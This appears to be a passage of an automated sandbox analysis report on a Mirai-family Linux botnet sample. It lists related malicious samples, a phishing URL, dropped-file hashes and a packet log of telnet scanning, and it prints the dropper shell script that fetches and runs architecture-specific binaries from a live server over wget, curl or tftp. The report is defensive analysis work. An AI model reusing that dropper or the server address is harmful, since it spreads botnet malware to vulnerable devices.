205.126.159.56	unknown	United States	210	WEST-NET-WESTUS	false
164.245.75.94	unknown	United States	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
57.10.226.162	unknown	Belgium	2686	ATGS-MMD-ASUS	false
118.251.90.41	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
117.126.202.87	unknown	China	7641	CHINABTNChinaBroadcastingTVNetCN	false
112.242.151.31	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
135.152.8.218	unknown	United States	14962	NCR-252US	false
41.74.231.222	unknown	unknown	37235	MimecastSAZA	false
148.142.94.12	unknown	United States	20004	MISOUS	false
174.72.38.255	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
63.188.242.150	unknown	United States	1239	SPRINTLINKUS	false
101.152.10.92	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
200.191.187.94	unknown	Brazil	4230	CLAROSABR	false
148.22.240.59	unknown	United States	6400	CompaniaDominicanadeTelefonosSADO	false
154.72.132.115	unknown	Cameroon	15964	CAMNET-ASCM	false
69.240.239.149	unknown	United States	7922	COMCAST-7922US	false
37.172.212.192	unknown	France	51207	FREEMFR	false
246.57.245.181	unknown	Reserved	unknown	unknown	false
54.171.230.55	unknown	United States	16509	AMAZON-02US	false
46.251.115.179	unknown	Cyprus	35432	CABLENET-ASCY	false
214.218.60.119	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
69.154.33.206	unknown	United States	7018	ATT-INTERNET4US	false
12.61.57.1	unknown	United States	7018	ATT-INTERNET4US	false
207.52.85.53	unknown	United States	1239	SPRINTLINKUS	false
21.150.40.24	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
106.147.219.116	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
150.96.78.16	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
186.245.163.63	unknown	Brazil	7738	TelemarNorteLesteSABR	false
77.82.180.107	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORION-ASNCA	XiVyESLidg.elf	Get hash	malicious	Mirai	Browse	142.155.4.95
	K46lj7Z4aM.elf	Get hash	malicious	Unknown	Browse	142.155.4.89
	0vuEeRIO5F.elf	Get hash	malicious	Unknown	Browse	142.154.238.12
	Kaisen.arm.elf	Get hash	malicious	Mirai	Browse	142.155.233.1
	armv7l.elf	Get hash	malicious	Unknown	Browse	142.155.73.154
	7DsyDtl3IE.elf	Get hash	malicious	Unknown	Browse	142.155.4.63
	YgdWRmC51w.elf	Get hash	malicious	Mirai	Browse	142.155.73.189
	DMobFlnC35.elf	Get hash	malicious	Mirai, Moobot	Browse	142.155.4.98
	nQBedHAquh.elf	Get hash	malicious	Moobot	Browse	142.154.233.113
	Josho.x86.elf	Get hash	malicious	Mirai	Browse	38.112.123.170
DNIC-ASBLK-00306-00371US	7cengGp7fU.elf	Get hash	malicious	Mirai	Browse	132.136.135.214
	VJy4TgKlVo.elf	Get hash	malicious	Mirai	Browse	132.152.90.143
	CGlwOBF2cH.elf	Get hash	malicious	Unknown	Browse	132.89.232.145
	C0v8GOapdi.elf	Get hash	malicious	Mirai, Okiru	Browse	132.127.178.223
	9wDlG5DeRK.elf	Get hash	malicious	Moobot	Browse	132.95.137.149
	gIzj2ZdSYV.elf	Get hash	malicious	Mirai, Moobot	Browse	132.143.96.21
	97zyqEu4Nh.elf	Get hash	malicious	Moobot	Browse	132.115.233.142
	bot.arm-20240324-1846.elf	Get hash	malicious	Mirai, Moobot	Browse	132.134.44.143
	h08xdwuTfW.elf	Get hash	malicious	Unknown	Browse	132.90.2.5
	K7HXpfSHdt.elf	Get hash	malicious	Mirai, Moobot	Browse	132.100.242.221
ATT-INTERNET4US	AMP4qOxnnc.elf	Get hash	malicious	Mirai	Browse	71.157.63.129
	mpsl.elf	Get hash	malicious	Mirai	Browse	99.181.169.213
	mips.elf	Get hash	malicious	Mirai	Browse	172.128.48.85
	arm.elf	Get hash	malicious	Mirai	Browse	74.167.235.120
	x86.elf	Get hash	malicious	Mirai	Browse	12.10.152.125
	arm7.elf	Get hash	malicious	Mirai	Browse	74.169.151.162
	8lzQh5F8lt.elf	Get hash	malicious	Mirai	Browse	107.112.85.158
	https://blee58.com/bl/ax/l?user=kenrod@me.com	Get hash	malicious	HTMLPhisher	Browse	209.38.240.137
	p8F35SRiO8.elf	Get hash	malicious	Mirai	Browse	12.186.129.103
	Kie7OQsnAC.elf	Get hash	malicious	Mirai	Browse	70.250.81.241
COMCAST-7922US	AMP4qOxnnc.elf	Get hash	malicious	Mirai	Browse	73.252.2.78
	Mcb5K3TOWT.exe	Get hash	malicious	Unknown	Browse	71.200.64.77
	mpsl.elf	Get hash	malicious	Mirai	Browse	73.72.154.181
	mips.elf	Get hash	malicious	Mirai	Browse	96.71.70.97
	arm.elf	Get hash	malicious	Mirai	Browse	98.227.120.14
	x86.elf	Get hash	malicious	Mirai	Browse	73.224.88.205
	8lzQh5F8lt.elf	Get hash	malicious	Mirai	Browse	75.74.47.233
	p8F35SRiO8.elf	Get hash	malicious	Mirai	Browse	96.95.24.66
	Kie7OQsnAC.elf	Get hash	malicious	Mirai	Browse	50.151.244.19
	brzffc2GOs.elf	Get hash	malicious	Mirai	Browse	74.155.237.14
CHINANET-BACKBONENo31Jin-rongStreetCN	AMP4qOxnnc.elf	Get hash	malicious	Mirai	Browse	59.175.154.136
	mpsl.elf	Get hash	malicious	Mirai	Browse	182.85.189.61
	mips.elf	Get hash	malicious	Mirai	Browse	115.203.215.44
	arm.elf	Get hash	malicious	Mirai	Browse	117.33.127.23
	x86.elf	Get hash	malicious	Mirai	Browse	222.177.247.136
	arm7.elf	Get hash	malicious	Mirai	Browse	1.70.131.58
	8lzQh5F8lt.elf	Get hash	malicious	Mirai	Browse	171.14.107.243
	p8F35SRiO8.elf	Get hash	malicious	Mirai	Browse	182.44.205.186
	Kie7OQsnAC.elf	Get hash	malicious	Mirai	Browse	121.8.155.110
	brzffc2GOs.elf	Get hash	malicious	Mirai	Browse	27.17.19.216

Process:	/usr/bin/wget
File Type:	ASCII text
Category:	dropped
Size (bytes):	477
Entropy (8bit):	4.939071879119062
Encrypted:	false
SSDEEP:	6:/VJ8UKUFwRVYk+EYnF1GijJjpR5vYF/KEp3F5kT6MFSGVKEnDj638VKE6HB4uVfN:/VJWRiMwjqF/eFSGgQrgffYR01wsx
MD5:	F90B999F2394E17C00763F3087DE45B2
SHA1:	10C940D1648F79B01D3D1980655F02B71A546083
SHA-256:	8A44482EE8E3B1BF45040CF703648065DB6EB3F7D78CDAC0C575B9BB8DAF0BE4
SHA-512:	8E51AD0387676BD98F42012647FD656CB9A3D67828DB9884C8F16987178CC20B3C9CF053B8CE552314236EEC25A1CF7156E40549DAC8C28D691B2784EA066F84
Malicious:	false
Reputation:	low
Preview:	binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc".server_ip="185.224.128.34".binout="system".exec="your device just got infected to a bootnoot"..rm -rf $binout.for arch in $binarys.do.rm -rf $arch.cd /tmp \|\| cd /var \|\| cd /dev; wget http://$server_ip/$arch -O $binout \|\| curl -O $binout http://$server_ip/$arch \|\| tftp -g -l $binout -r $arch $server_ip.chmod 777 $binout.status=`./$binout $1`.if [ "$status" = "$exec" ]; then..rm -rf $binout..break.fi.rm -rf $binout.done.

/tmp/system

Download File

Process:	/usr/bin/wget
File Type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Category:	dropped
Size (bytes):	71788
Entropy (8bit):	5.3758373138041495
Encrypted:	false
SSDEEP:	1536:n5f4U2ToooooUs3sapQ6Nf/UCTKNKGoCjYYtJ7Z:OU2TbL633tf/UCTK4G3kYTN
MD5:	CBE6220CD6DD38552E44F580D3ED41EC
SHA1:	DD4FC0EA4D7A71A9E8C51CA5D42F8DE837C7C3C3
SHA-256:	B43B4D6E51010C48565B41DFFA873BCF74D92464A02EAC0192919F201ADC98F4
SHA-512:	346FB6AD335E7DF3E6077FCE74623D679EDC0C7A38F669E183ED43F50B2FA52A9098C3ECA435D0FA93B3E6F752F2C6B4BE4ACDB219654BADE898393DC5DFDE44
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Mirai_5, Description: Yara detected Mirai, Source: /tmp/system, Author: Joe Security Rule: MAL_ELF_LNX_Mirai_Oct10_2, Description: Detects ELF malware Mirai related, Source: /tmp/system, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Reputation:	low
Preview:	.ELF.....................@.`...4...<.....4. ...(.............@...@.....p...p.................E...E.........X........dt.Q............................<...'......!'.....................<...'......!... ....'9... ......................<...'..x...!........'9... ..........................'.. <...'..@...!'..... .....................".......@................. .....Y....... ..$B... ..... ... .....Y....... ..$B.....L.....@..$..........L..... ..$..p....$...."..... ............'..(<...'......!'.........................$..p.@..$.... ..............................@..$.... ........... ..'.. ............'.. .......!........<...'......!...!.......'...$......$'.................................... ..........................<...'......!'....-t..-p..-l..-h..-d..-`..-\..-X..-T..-P....0......P...!$.....8!...!0.... (!. .... !...... !...l. (!$...$.... ...@.!.....`...@.!...H..... ...` !(B.......@..*....@.....!$......x.. !. ..$........@.!.@.!...L...!.............B...@.....<&D...`(!.......@.....C.#..!."..

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2024 09:24:47.850714922 CET	47770	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.029221058 CET	80	47770	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.029470921 CET	47770	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.031253099 CET	47770	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.209667921 CET	80	47770	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.209716082 CET	80	47770	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.209794998 CET	47770	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.286066055 CET	47770	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.375425100 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.464553118 CET	80	47770	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.464745045 CET	47770	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.549845934 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.550060987 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.552035093 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.726336002 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.726557016 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.726687908 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.726742983 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.726742983 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.726774931 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.726819992 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.726849079 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.726882935 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.726937056 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.726969004 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.726993084 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.727032900 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.727068901 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.727114916 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.727142096 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.727180958 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.727184057 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.727216959 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.727245092 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.727284908 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.901158094 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901192904 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901304007 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901316881 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901330948 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901396036 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901443005 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901465893 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.901465893 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.901465893 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.901465893 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.901465893 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.901465893 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.901549101 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901649952 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901710033 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901771069 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901818037 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901876926 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901921034 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.901956081 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.901956081 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.901983976 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.902019978 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.902034998 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.902077913 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.902096033 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.902137995 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.902147055 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.902175903 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.902234077 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.902265072 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:48.902276039 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:48.902311087 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.075910091 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.075948000 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.075958967 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.075972080 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.075984001 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.075995922 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076008081 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076020956 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076112986 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076112986 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076112986 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076112986 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076112986 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076112986 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076112986 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076112986 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076119900 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076133966 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076169014 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076169014 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076186895 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076195955 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076205015 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076210976 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076253891 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076451063 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076467991 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076481104 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076539993 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076613903 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076622009 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.076646090 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076669931 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076705933 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076735020 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076833010 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.076870918 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.077014923 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.077027082 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.087999105 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.162802935 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.318860054 CET	10792	23	192.168.2.23	106.148.45.41
Mar 29, 2024 09:24:49.318892956 CET	10792	23	192.168.2.23	200.149.252.41
Mar 29, 2024 09:24:49.318893909 CET	10792	23	192.168.2.23	223.68.120.41
Mar 29, 2024 09:24:49.318895102 CET	10792	23	192.168.2.23	150.96.78.16
Mar 29, 2024 09:24:49.318905115 CET	10792	23	192.168.2.23	78.62.8.114
Mar 29, 2024 09:24:49.318906069 CET	10792	23	192.168.2.23	249.225.40.54
Mar 29, 2024 09:24:49.318913937 CET	10792	23	192.168.2.23	210.59.137.93
Mar 29, 2024 09:24:49.318929911 CET	10792	23	192.168.2.23	137.203.160.108
Mar 29, 2024 09:24:49.318929911 CET	10792	23	192.168.2.23	32.142.109.173
Mar 29, 2024 09:24:49.318938017 CET	10792	23	192.168.2.23	129.109.37.211
Mar 29, 2024 09:24:49.318939924 CET	10792	23	192.168.2.23	12.61.57.1
Mar 29, 2024 09:24:49.318941116 CET	10792	23	192.168.2.23	143.102.55.216
Mar 29, 2024 09:24:49.318942070 CET	10792	23	192.168.2.23	85.108.69.44
Mar 29, 2024 09:24:49.318965912 CET	10792	23	192.168.2.23	51.207.27.93
Mar 29, 2024 09:24:49.318968058 CET	10792	23	192.168.2.23	106.188.187.62
Mar 29, 2024 09:24:49.318968058 CET	10792	23	192.168.2.23	108.84.81.58
Mar 29, 2024 09:24:49.318973064 CET	10792	23	192.168.2.23	77.185.84.58
Mar 29, 2024 09:24:49.318998098 CET	10792	23	192.168.2.23	249.76.250.189
Mar 29, 2024 09:24:49.319000959 CET	10792	23	192.168.2.23	199.15.94.9
Mar 29, 2024 09:24:49.319005013 CET	10792	23	192.168.2.23	136.7.114.33
Mar 29, 2024 09:24:49.319005013 CET	10792	23	192.168.2.23	25.75.3.40
Mar 29, 2024 09:24:49.319005013 CET	10792	23	192.168.2.23	246.184.16.162
Mar 29, 2024 09:24:49.319010019 CET	10792	23	192.168.2.23	109.172.227.147
Mar 29, 2024 09:24:49.319015026 CET	10792	23	192.168.2.23	25.90.213.142
Mar 29, 2024 09:24:49.319020987 CET	10792	23	192.168.2.23	205.200.24.255
Mar 29, 2024 09:24:49.319020987 CET	10792	23	192.168.2.23	71.24.26.169
Mar 29, 2024 09:24:49.319021940 CET	10792	23	192.168.2.23	135.152.8.218
Mar 29, 2024 09:24:49.319021940 CET	10792	23	192.168.2.23	118.3.19.175
Mar 29, 2024 09:24:49.319021940 CET	10792	23	192.168.2.23	76.149.240.145
Mar 29, 2024 09:24:49.319025993 CET	10792	23	192.168.2.23	164.245.75.94
Mar 29, 2024 09:24:49.319036961 CET	10792	23	192.168.2.23	133.165.237.162
Mar 29, 2024 09:24:49.319039106 CET	10792	23	192.168.2.23	191.134.200.230
Mar 29, 2024 09:24:49.319036961 CET	10792	23	192.168.2.23	20.149.69.44
Mar 29, 2024 09:24:49.319050074 CET	10792	23	192.168.2.23	245.180.32.248
Mar 29, 2024 09:24:49.319052935 CET	10792	23	192.168.2.23	63.188.242.150
Mar 29, 2024 09:24:49.319053888 CET	10792	23	192.168.2.23	155.149.137.144
Mar 29, 2024 09:24:49.319078922 CET	10792	23	192.168.2.23	254.101.85.223
Mar 29, 2024 09:24:49.319080114 CET	10792	23	192.168.2.23	215.227.236.246
Mar 29, 2024 09:24:49.319078922 CET	10792	23	192.168.2.23	79.94.26.119
Mar 29, 2024 09:24:49.319083929 CET	10792	23	192.168.2.23	46.75.183.200
Mar 29, 2024 09:24:49.319087982 CET	10792	23	192.168.2.23	97.243.62.227
Mar 29, 2024 09:24:49.319097042 CET	10792	23	192.168.2.23	205.59.146.130
Mar 29, 2024 09:24:49.319107056 CET	10792	23	192.168.2.23	195.182.43.120
Mar 29, 2024 09:24:49.319107056 CET	10792	23	192.168.2.23	246.146.104.30
Mar 29, 2024 09:24:49.319108963 CET	10792	23	192.168.2.23	41.171.76.135
Mar 29, 2024 09:24:49.319112062 CET	10792	23	192.168.2.23	141.37.74.243
Mar 29, 2024 09:24:49.319113016 CET	10792	23	192.168.2.23	33.86.44.99
Mar 29, 2024 09:24:49.319118977 CET	10792	23	192.168.2.23	89.254.150.24
Mar 29, 2024 09:24:49.319127083 CET	10792	23	192.168.2.23	35.118.4.255
Mar 29, 2024 09:24:49.319130898 CET	10792	23	192.168.2.23	57.10.226.162
Mar 29, 2024 09:24:49.319130898 CET	10792	23	192.168.2.23	68.38.166.33
Mar 29, 2024 09:24:49.319138050 CET	10792	23	192.168.2.23	162.66.218.70
Mar 29, 2024 09:24:49.319142103 CET	10792	23	192.168.2.23	121.120.6.212
Mar 29, 2024 09:24:49.319156885 CET	10792	23	192.168.2.23	137.136.159.63
Mar 29, 2024 09:24:49.319156885 CET	10792	23	192.168.2.23	242.4.139.255
Mar 29, 2024 09:24:49.319156885 CET	10792	23	192.168.2.23	174.128.255.203
Mar 29, 2024 09:24:49.319171906 CET	10792	23	192.168.2.23	214.218.60.119
Mar 29, 2024 09:24:49.319175959 CET	10792	23	192.168.2.23	159.6.146.137
Mar 29, 2024 09:24:49.319175959 CET	10792	23	192.168.2.23	2.194.18.214
Mar 29, 2024 09:24:49.319184065 CET	10792	23	192.168.2.23	142.155.153.213
Mar 29, 2024 09:24:49.319184065 CET	10792	23	192.168.2.23	121.163.237.152
Mar 29, 2024 09:24:49.319206953 CET	10792	23	192.168.2.23	180.101.190.123
Mar 29, 2024 09:24:49.319216967 CET	10792	23	192.168.2.23	251.142.244.45
Mar 29, 2024 09:24:49.319216967 CET	10792	23	192.168.2.23	205.126.159.56
Mar 29, 2024 09:24:49.319216967 CET	10792	23	192.168.2.23	246.57.245.181
Mar 29, 2024 09:24:49.319219112 CET	10792	23	192.168.2.23	61.167.69.209
Mar 29, 2024 09:24:49.319221020 CET	10792	23	192.168.2.23	222.23.60.106
Mar 29, 2024 09:24:49.319221020 CET	10792	23	192.168.2.23	181.179.133.72
Mar 29, 2024 09:24:49.319237947 CET	10792	23	192.168.2.23	246.137.77.56
Mar 29, 2024 09:24:49.319240093 CET	10792	23	192.168.2.23	198.113.55.216
Mar 29, 2024 09:24:49.319240093 CET	10792	23	192.168.2.23	25.186.29.17
Mar 29, 2024 09:24:49.319246054 CET	10792	23	192.168.2.23	252.142.212.181
Mar 29, 2024 09:24:49.319250107 CET	10792	23	192.168.2.23	70.140.37.1
Mar 29, 2024 09:24:49.319264889 CET	10792	23	192.168.2.23	23.13.215.112
Mar 29, 2024 09:24:49.319267988 CET	10792	23	192.168.2.23	69.240.239.149
Mar 29, 2024 09:24:49.319282055 CET	10792	23	192.168.2.23	107.212.160.104
Mar 29, 2024 09:24:49.319283009 CET	10792	23	192.168.2.23	35.119.215.18
Mar 29, 2024 09:24:49.319288969 CET	10792	23	192.168.2.23	21.150.40.24
Mar 29, 2024 09:24:49.319302082 CET	10792	23	192.168.2.23	200.191.187.94
Mar 29, 2024 09:24:49.319303036 CET	10792	23	192.168.2.23	131.69.86.207
Mar 29, 2024 09:24:49.319305897 CET	10792	23	192.168.2.23	101.152.10.92
Mar 29, 2024 09:24:49.319384098 CET	10792	23	192.168.2.23	206.246.132.37
Mar 29, 2024 09:24:49.319385052 CET	10792	23	192.168.2.23	121.60.216.97
Mar 29, 2024 09:24:49.319395065 CET	10792	23	192.168.2.23	27.123.186.212
Mar 29, 2024 09:24:49.319402933 CET	10792	23	192.168.2.23	35.47.122.83
Mar 29, 2024 09:24:49.319402933 CET	10792	23	192.168.2.23	86.205.223.215
Mar 29, 2024 09:24:49.319422960 CET	10792	23	192.168.2.23	146.58.151.45
Mar 29, 2024 09:24:49.319423914 CET	10792	23	192.168.2.23	39.235.255.226
Mar 29, 2024 09:24:49.319425106 CET	10792	23	192.168.2.23	183.249.94.64
Mar 29, 2024 09:24:49.319426060 CET	10792	23	192.168.2.23	130.74.148.203
Mar 29, 2024 09:24:49.319442987 CET	10792	23	192.168.2.23	77.82.180.107
Mar 29, 2024 09:24:49.319447041 CET	10792	23	192.168.2.23	14.43.59.173
Mar 29, 2024 09:24:49.319448948 CET	10792	23	192.168.2.23	65.9.99.136
Mar 29, 2024 09:24:49.319449902 CET	10792	23	192.168.2.23	40.197.91.25
Mar 29, 2024 09:24:49.319463968 CET	10792	23	192.168.2.23	98.168.167.168
Mar 29, 2024 09:24:49.319480896 CET	10792	23	192.168.2.23	136.123.138.84
Mar 29, 2024 09:24:49.319484949 CET	10792	23	192.168.2.23	250.41.72.60
Mar 29, 2024 09:24:49.319487095 CET	10792	23	192.168.2.23	159.232.171.75
Mar 29, 2024 09:24:49.319489002 CET	10792	23	192.168.2.23	19.196.210.101
Mar 29, 2024 09:24:49.319489002 CET	10792	23	192.168.2.23	68.105.129.181
Mar 29, 2024 09:24:49.319494963 CET	10792	23	192.168.2.23	112.242.151.31
Mar 29, 2024 09:24:49.319508076 CET	10792	23	192.168.2.23	132.166.82.88
Mar 29, 2024 09:24:49.319509983 CET	10792	23	192.168.2.23	77.228.8.74
Mar 29, 2024 09:24:49.319524050 CET	10792	23	192.168.2.23	110.153.160.138
Mar 29, 2024 09:24:49.319525003 CET	10792	23	192.168.2.23	32.6.104.224
Mar 29, 2024 09:24:49.319525003 CET	10792	23	192.168.2.23	122.119.139.223
Mar 29, 2024 09:24:49.319525003 CET	10792	23	192.168.2.23	202.147.86.193
Mar 29, 2024 09:24:49.319539070 CET	10792	23	192.168.2.23	198.225.67.171
Mar 29, 2024 09:24:49.319556952 CET	10792	23	192.168.2.23	118.251.90.41
Mar 29, 2024 09:24:49.319566965 CET	10792	23	192.168.2.23	64.70.95.9
Mar 29, 2024 09:24:49.319566965 CET	10792	23	192.168.2.23	156.195.94.180
Mar 29, 2024 09:24:49.319581032 CET	10792	23	192.168.2.23	120.192.162.204
Mar 29, 2024 09:24:49.319583893 CET	10792	23	192.168.2.23	69.154.33.206
Mar 29, 2024 09:24:49.319600105 CET	10792	23	192.168.2.23	126.88.253.143
Mar 29, 2024 09:24:49.319601059 CET	10792	23	192.168.2.23	147.97.61.206
Mar 29, 2024 09:24:49.319612980 CET	10792	23	192.168.2.23	57.85.165.192
Mar 29, 2024 09:24:49.319612980 CET	10792	23	192.168.2.23	78.61.45.250
Mar 29, 2024 09:24:49.319616079 CET	10792	23	192.168.2.23	143.181.220.67
Mar 29, 2024 09:24:49.319628954 CET	10792	23	192.168.2.23	249.143.138.72
Mar 29, 2024 09:24:49.319631100 CET	10792	23	192.168.2.23	129.134.47.150
Mar 29, 2024 09:24:49.319638014 CET	10792	23	192.168.2.23	5.189.238.133
Mar 29, 2024 09:24:49.319642067 CET	10792	23	192.168.2.23	251.77.216.178
